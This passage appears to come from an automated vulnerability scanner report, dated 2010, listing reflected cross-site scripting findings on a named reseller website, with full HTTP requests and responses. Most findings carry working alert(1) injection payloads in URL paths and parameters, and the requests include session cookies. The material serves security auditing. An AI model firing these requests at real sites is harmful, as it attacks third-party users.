Content-Length: 9252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta
...[SNIP]...
<input type="hidden" name="f" value="13988f\"><img src=a onerror=alert(1)>bdfb399a39b" />
...[SNIP]...

2.3934. http://www.resellerbase.com/login.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php

Issue detail

The scanner classifies this insertion point as the name of an arbitrarily supplied request parameter, and the payload cd812"><img%20src%3da%20onerror%3dalert(1)>533065831e7 was submitted there. The recorded request, however, shows the payload placed inside the value of the b parameter (between the %2Fc and p%2F fragments of the original /cp/ value), and the response reflects it inside the value attribute of the hidden input named b, as cd812\"><img src=a onerror=alert(1)>533065831e7. In practice this exercises the same double-quoted attribute sink as 2.3932, with the same backslash escaping that HTML ignores.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login.php?f=1&b=%2Fc/cd812"><img%20src%3da%20onerror%3dalert(1)>533065831e7p%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:25:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
Content-Length: 9271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/c/cd812\"><img src=a onerror=alert(1)>533065831e7p/" />
...[SNIP]...

2.3935. http://www.resellerbase.com/login.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /login.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9135f<script>alert(1)</script>3fdcf8e38b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.php9135f<script>alert(1)</script>3fdcf8e38b9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:18:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /login.php9135f<script>alert(1)</script>3fdcf8e38b9/ was not found on this server.</p>
...[SNIP]...

2.3936. http://www.resellerbase.com/mailing_list.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /mailing_list.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dcd48<script>alert(1)</script>f1aac486bf27b4c03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mailing_list.phpdcd48<script>alert(1)</script>f1aac486bf27b4c03?email=wiener@example.com&pflag=ml&act=unsubscribe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /mailing_list.phpdcd48<script>alert(1)</script>f1aac486bf27b4c03?email=wiener@example.com&pflag=ml&act=unsubscribe was not found on this server.</p>
...[SNIP]...

2.3937. http://www.resellerbase.com/mailing_list.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /mailing_list.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c9f04<script>alert(1)</script>040cc9ffbe5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mailing_list.phpc9f04<script>alert(1)</script>040cc9ffbe5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /mailing_list.phpc9f04<script>alert(1)</script>040cc9ffbe5 was not found on this server.</p>
...[SNIP]...

2.3938. http://www.resellerbase.com/mailing_list.php [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /mailing_list.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70cf1"><img%20src%3da%20onerror%3dalert(1)>cf38fb20dd62ba9ea was submitted in the email parameter. This input was echoed as 70cf1\"><img src=a onerror=alert(1)>cf38fb20dd62ba9ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /mailing_list.php?email=wiener@example.com70cf1"><img%20src%3da%20onerror%3dalert(1)>cf38fb20dd62ba9ea&pflag=ml&act=unsubscribe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Mailing List</title>
...[SNIP]...
<input class="text3" type="text" name="email" size="30" value="wiener@example.com70cf1\"><img src=a onerror=alert(1)>cf38fb20dd62ba9ea" />
...[SNIP]...

2.3939. http://www.resellerbase.com/modify.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /modify.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86ce5<script>alert(1)</script>cdda088ee8bec03cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /modify.php86ce5<script>alert(1)</script>cdda088ee8bec03cb?query=555-555-0199@example.com&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /modify.php86ce5<script>alert(1)</script>cdda088ee8bec03cb?query=555-555-0199@example.com&pflag=search&submit=Search was not found on this server.</p>
...[SNIP]...

2.3940. http://www.resellerbase.com/modify.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /modify.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a938c<script>alert(1)</script>050f4435d80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modify.phpa938c<script>alert(1)</script>050f4435d80 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /modify.phpa938c<script>alert(1)</script>050f4435d80 was not found on this server.</p>
...[SNIP]...

2.3941. http://www.resellerbase.com/modify.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /modify.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 1208d<img%20src%3da%20onerror%3dalert(1)>9e4e936397135cd28 was submitted in the query parameter. This input was echoed as 1208d<img src=a onerror=alert(1)>9e4e936397135cd28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /modify.php?query=555-555-0199@example.com1208d<img%20src%3da%20onerror%3dalert(1)>9e4e936397135cd28&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<b>555-555-0199@example.com1208d<img src=a onerror=alert(1)>9e4e936397135cd28</b>
...[SNIP]...

2.3942. http://www.resellerbase.com/modify.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /modify.php

Issue detail

The value of the query request parameter is copied into the HTML document as text between TITLE tags. The payload 4b638</title><img%20src%3da%20onerror%3dalert(1)>65febdfbfb0c2a9a2 was submitted in the query parameter. This input was echoed as 4b638</title><img src=a onerror=alert(1)>65febdfbfb0c2a9a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /modify.php?query=555-555-0199@example.com4b638</title><img%20src%3da%20onerror%3dalert(1)>65febdfbfb0c2a9a2&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-555-0199@example.com4b638</title><img src=a onerror=alert(1)>65febdfbfb0c2a9a2</title>
...[SNIP]...

2.3943. http://www.resellerbase.com/modify.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /modify.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4109"><img%20src%3da%20onerror%3dalert(1)>57f7a1ae8fc2a93c5 was submitted in the query parameter. This input was echoed as c4109\"><img src=a onerror=alert(1)>57f7a1ae8fc2a93c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /modify.php?query=555-555-0199@example.comc4109"><img%20src%3da%20onerror%3dalert(1)>57f7a1ae8fc2a93c5&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/modify.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<input type="text" name="keyword" size="20"

value="555-555-0199@example.comc4109\"><img src=a onerror=alert(1)>57f7a1ae8fc2a93c5"
/>
...[SNIP]...

2.3944. http://www.resellerbase.com/modify.php/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /modify.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 797f1<script>alert(1)</script>bb218c03032 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modify.php797f1<script>alert(1)</script>bb218c03032/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /modify.php797f1<script>alert(1)</script>bb218c03032/ was not found on this server.</p>
...[SNIP]...

2.3945. http://www.resellerbase.com/new.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /new.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47250<script>alert(1)</script>9a3ba435793 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new.php47250<script>alert(1)</script>9a3ba435793 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /new.php47250<script>alert(1)</script>9a3ba435793 was not found on this server.</p>
...[SNIP]...

2.3946. http://www.resellerbase.com/new.php [dt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /new.php

Issue detail

The value of the dt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 780d3"><img%20src%3da%20onerror%3dalert(1)>a199af09793 was submitted in the dt parameter. This input was echoed as 780d3\"><img src=a onerror=alert(1)>a199af09793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /new.php?st=cat&id=3&dt=1288843200780d3"><img%20src%3da%20onerror%3dalert(1)>a199af09793 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:24:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Listings</title>
...[SNIP]...
<a href="new.php?st=date&amp;dt=1288843200780d3\"><img src=a onerror=alert(1)>a199af09793">
...[SNIP]...

2.3947. http://www.resellerbase.com/new.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /new.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6248b"><img%20src%3da%20onerror%3dalert(1)>e45522d26a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6248b\"><img src=a onerror=alert(1)>e45522d26a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /new.php?st=cat&id=3&dt=128884/6248b"><img%20src%3da%20onerror%3dalert(1)>e45522d26a63200 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:27:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New Listings</title>
...[SNIP]...
<a href="new.php?st=date&amp;dt=128884/6248b\"><img src=a onerror=alert(1)>e45522d26a63200">
...[SNIP]...

2.3948. http://www.resellerbase.com/other/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /other/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4aa0a<script>alert(1)</script>e95641f9909 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other4aa0a<script>alert(1)</script>e95641f9909/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other4aa0a<script>alert(1)</script>e95641f9909/ was not found on this server.</p>
...[SNIP]...

2.3949. http://www.resellerbase.com/other/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /other/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9c232<script>alert(1)</script>25fcdf8e3df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /other/?9c232<script>alert(1)</script>25fcdf8e3df=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/?9c232<script>alert(1)</script>25fcdf8e3df=1 was not found on this server.</p>
...[SNIP]...

2.3950. http://www.resellerbase.com/other/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /other/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 9877e<a>338d937379a was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f9877e<a>338d937379a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f9877e<a>338d937379a was not found on this server.</p>
...[SNIP]...

2.3951. http://www.resellerbase.com/other/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /other/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee441<script>alert(1)</script>84bd3d224f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /otheree441<script>alert(1)</script>84bd3d224f5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/other/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /otheree441<script>alert(1)</script>84bd3d224f5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3952. http://www.resellerbase.com/other/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /other/search.php

Issue detail

